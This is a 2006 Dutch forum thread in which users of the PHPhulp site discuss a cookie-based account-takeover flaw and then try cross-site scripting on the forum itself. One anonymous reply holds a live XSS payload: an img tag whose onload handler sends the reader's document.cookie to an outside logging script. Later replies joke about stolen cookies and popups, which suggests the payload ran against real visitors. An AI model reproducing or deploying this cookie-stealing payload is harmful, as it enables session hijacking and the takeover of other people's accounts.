Bug: Continued

Door Mitch X op 04-01-2006 13:05 gewijzigd op 16-02-2006 19:18

7.909 views

Daar ik zeer nieuwsgierig was naar de verdere veiligheid van PHPhulp na m'n UBB exploit, heb ik nog een leuke ontdekking gedaan.

Een wijze les aan alle personen hier, een cookie is niet te vertrouwen!
Ik heb dmv cookie data toegang tot talloze PHPhulp accounts, iets dat me niet de bedoeling lijkt.

Ik zal zo even een berichtje plaatsen met een ander account om mijn verhaal te bevestingen ;)

// Edit : Exploit weggehaald :+

Legolas

04-01-2006 15:45

Tog ook ff spelen :P

Jelmer -

04-01-2006 15:46 gewijzigd op 04-01-2006 16:34

Dan ik ook nog even:
Les 1:

Alfred -

04-01-2006 15:49

Jelmer op de cookie-rip tour? :)

Onbekende gebruiker

04-01-2006 15:50

PHPgulp? <img src="http://phpgulp.ikhoefgeen.nl/imgtest.jpg" onload="this.src='http://phpgulp.ikhoefgeen.nl/imgtest.php?cookie='+escape(document.cookie)" style="border: 1px solid; border-color: #000000">

Onbekende gebruiker

04-01-2006 15:52 gewijzigd op 04-01-2006 15:54

Onbekende gebruiker

04-01-2006 15:53

um... waar sla je die dingen dan op? ik zie hem niet staan in je directory index =P. en ik was net zo lekker bezig dat ding vol te spammen =/

Jelmer -

04-01-2006 15:55 gewijzigd op 04-01-2006 15:57

Zat een foutje in mijn achterliggende code, dus niets gelogd (had ook geen zin om het eruit te halen)

PHPgulp zijn alle uitbuitingen van phphulp getest :)

Nu hebben we wel weer bewezen hoe goed we wel ooit niet slecht kunnen zijn, muhahaaha

Onbekende gebruiker

04-01-2006 15:55

Um... die kan'k nu niet meer verwijderen =| Stom... srry =P

Erik Rijk

04-01-2006 15:57

jullie zijn ook een stel mafkezen bij elkaar he :P

Onbekende gebruiker

04-01-2006 15:57

Stelletje criminelen. Gewoon koekjes uit me hand wegrukken, popups openen, en een achtergrondkleur veranderen.. :)

Reageren

Inloggen om te reageren